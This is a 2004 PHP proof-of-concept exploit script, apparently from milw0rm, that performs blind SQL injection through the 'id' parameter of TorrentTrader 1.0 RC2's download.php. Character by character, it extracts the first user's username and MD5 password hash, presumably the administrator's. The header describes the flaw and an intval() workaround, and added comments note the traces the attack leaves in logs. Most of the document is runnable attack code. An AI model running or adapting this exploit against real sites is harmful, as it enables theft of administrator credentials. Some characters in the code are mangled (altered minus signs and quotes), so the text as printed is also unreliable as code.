  1    #!/usr/bin/php
  2
  3
  4    <?
  5
  6
  7    /*
  8
  9
  10   TorrentTrader 1.0 RC2 SQL Injection Proof of Concept
  11   By aCiDBiTS acidbits_at_hotmail.com 31−August−2004
  12
  13
  14   "TorrentTrader (http://www.torrenttrader.com/) is a feature packed and
  15   highly customisable open-source BitTorrent tracker."
  16
  17
  18   This PoC dumps the username and the MD5 hash of the password of the first user
  19   in the TorrentTrader web application database, which should be the administrator.
  20   First it fetches a valid torrent id, then it determines whether the database user
  21   can perform "union select", and finally obtains the username and
  22   md5(password). Tested on TorrentTrader 1.0 RC2; older versions may also be
  23   vulnerable.
  24
  25
  26   Usage (in my debian box):
  27   php4 −q ./tt_sqli_poc.php "http://127.0.0.1/torrenttrade"
  28
  29
  30
  31   ++ Vulnerability description & workaround++
  32
  33
  34   There is no user input sanitization for the parameter "id" in download.php before
  35   it is used in a SQL query. This can be exploited to manipulate SQL queries
  36   by injecting arbitrary SQL code. A workaround is to modify
  37   download.php, line 13:
  38
  39
  40   $res = mysql_query("SELECT filename FROM torrents WHERE id = $id");
  41
  42
  43   With:
  44
  45
  46   $res = mysql_query("SELECT filename FROM torrents WHERE id =
  47   ".intval($id));
  48
  49
  50
  51   */
  52

  53
  54
        // Print the PoC banner to stdout.
  55    echo "+−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+\n|
  56    TorrentTrader 1.0 RC2 SQL Injection Proof of Concept |\n| By aCiDBiTS
  57    acidbits_at_hotmail.com 31−August−2004
  58    |\n+−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+\n\n";
  59
  60
  61
        // CLI entry point: the only argument is the base URL of the TorrentTrader
        // install. $host is a global read by test_cond(); a trailing '/' is appended
        // when the caller omitted it.
  62    if($argc<2) die("Usage: ".$argv[0]." URL_to_TorrentTrader_script\n\n");
  63    $host=$argv[1];
  64    if(substr($host,strlen($host)−1,1)!=’/’) $host.=’/’;
  65
  66
        // Step 1: fetch the front page and take the first id that follows a
        // "torrents-details.php?id=" link. intval() yields 0 when nothing matched,
        // which aborts the run.
  67    echo "[+] Getting valid torrent id ... ";
  68    $webc=get_web($host);
  69    $temp=explode("torrents−details.php?id=",$webc);
  70    $id=intval($temp[1]);
  71    if( !$id ) die( "Failed!\n\n");
  72    echo "OK\n Using Torrent id: $id\n\n";
  73
  74
        // Step 2: confirm the boolean oracle. $bas is the URL-encoded prefix that
        // every later probe is built from (it is also read as a global by
        // get_field()). The injection counts as confirmed only when a trivially
        // true tail and a trivially false tail produce different responses.
        // Defensive note: the "union select" / "from users" tokens inside the
        // download.php "id" query string are the part of this probe that is
        // visible in web server access logs.
  75    echo "[+] Checking if injection is possible ... ";
  76    $bas=$id."%20and%200%20union%20select%201%20from%20users%20where%20";
  77    if( test_cond( $bas."1" ) && !test_cond( $bas."0" ) ) echo " OK\n\n"; else
  78    die ("\n\n Failed! \n\n");
  79
  80
        // Step 3: recover the two column values character by character; get_field()
        // echoes each character as it is found.
  81    echo "[+] Getting username & password ... \n Username: ";
  82    get_field( "username");
  83    echo "\n MD5(Password): ";
  84    get_field( "password" );
  85
  86
        // Closing banner; die() ends the script here.
  87    die("\n\n \ / \ /\n (Oo) Done! (oO)\n //||\\\\
  88    //||\\\\\n\n");
  89
  90
  91
        /**
         * Boolean oracle for the blind injection.
         *
         * Requests download.php?id=<$cond> on $host (global) via get_web() and
         * reports whether the response body contains the marker text
         * "The ID has been found on the Database, but the torrent has gone!",
         * i.e. whether the injected WHERE clause evaluated to true.
         *
         * @param string $cond  URL-encoded tail appended to the "id" parameter
         * @return int 1 when the marker text is present, 0 otherwise
         *
         * NOTE(review): eregi() is no longer available in current PHP releases,
         * and the pattern literal appears to have been wrapped across two lines
         * by the document extraction — the original was presumably one line.
         */
  92    function test_cond( $cond )
  93    {
  94    global $host;
  95    $res=get_web( $host."download.php?id=".$cond);
  96    if( eregi( "The ID has been found on the Database, but the torrent has
  97    gone!", $res ) )
  98    return 1;
  99    else return 0;
  100   }
  101
  102
  103
        /**
         * Extracts one column of the first row of the users table, one character
         * at a time, and echoes each character as soon as it is found.
         *
         * For each position $idx a binary search over the candidate alphabet
         * $unval is driven by test_cond(): an "=" probe tests the midpoint
         * character, a "<" probe decides which half to keep. After a hit, the
         * search restarts for the next position; the function returns when the
         * probe for the next position fails (presumably end of the value), and
         * dies if the search window collapses without a hit.
         *
         * Every probe is a separate HTTP request to download.php, so a run of
         * this function leaves many near-identical "id=" query strings per
         * recovered character in the web server access log — a high-volume
         * pattern that is straightforward to alert on.
         *
         * @param string $field  column name in the users table ("username" or "password")
         * @return void
         */
  104   function get_field( $field )
  105   {
        // $bas is the injection prefix built by the top-level script.
  106   global $bas;
  107   $unval= " 0123456789ABCDEFGHIJKLMNOPRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
  108   $idx=1;
  109   $min=0;
  110   $max=strlen($unval);
  111   while($min!=$max) {
  112   $mid=$min+(($max−$min)/2);
        // Equality probe against the midpoint candidate character.
  113   if(
  114   test_cond($bas."id=1%20and%20ord(substring($field,$idx,1))=".ord(substr($unval,$mid,1)))
  115   ) {
  116   $idx++;
  117   echo substr($unval,$mid,1);
  118   $min=0;
  119   $max=strlen($unval);
        // Stop when there is no character at the next position.
  120   if( !test_cond($bas."id=1%20and%20ord(substring($field,$idx,1))") )
  121   return;
  122   } else {
        // Ordering probe: narrow the window to the lower or upper half.
  123   if(
  124   test_cond($bas."id=1%20and%20ord(substring($field,$idx,1))<".ord(substr($unval,$mid,1)))
  125   ) $max=$mid;
  126   else $min=$mid;
  127   }
  128   }
  129   die( "\n\nUnexpected error!\n\n");
  130   }
  131
  132
  133
        /**
         * Fetches $url with cURL and returns the response body.
         *
         * Response headers are excluded (CURLOPT_HEADER = 0) and the body is
         * returned instead of printed (CURLOPT_RETURNTRANSFER = 1). The result of
         * curl_exec() is passed through unchanged, so callers receive false on a
         * transport error; no status code or error check is performed here.
         *
         * @param string $url  absolute URL to request
         * @return string|false
         */
  134   function get_web($url)
  135   {
  136   $ch=curl_init();
  137   curl_setopt ($ch, CURLOPT_URL, $url);
  138   curl_setopt ($ch, CURLOPT_HEADER, 0);
  139   curl_setopt ($ch, CURLOPT_RETURNTRANSFER,1);
  140   $data=curl_exec ($ch);
  141   curl_close ($ch);
  142   return $data;
  143   }
  144
  145
  146
  147   /* \ /
  148   (Oo)
  149   //||\\ */
  150
  151
  152   ?>
  153
  154   # milw0rm.com [2004−09−01]

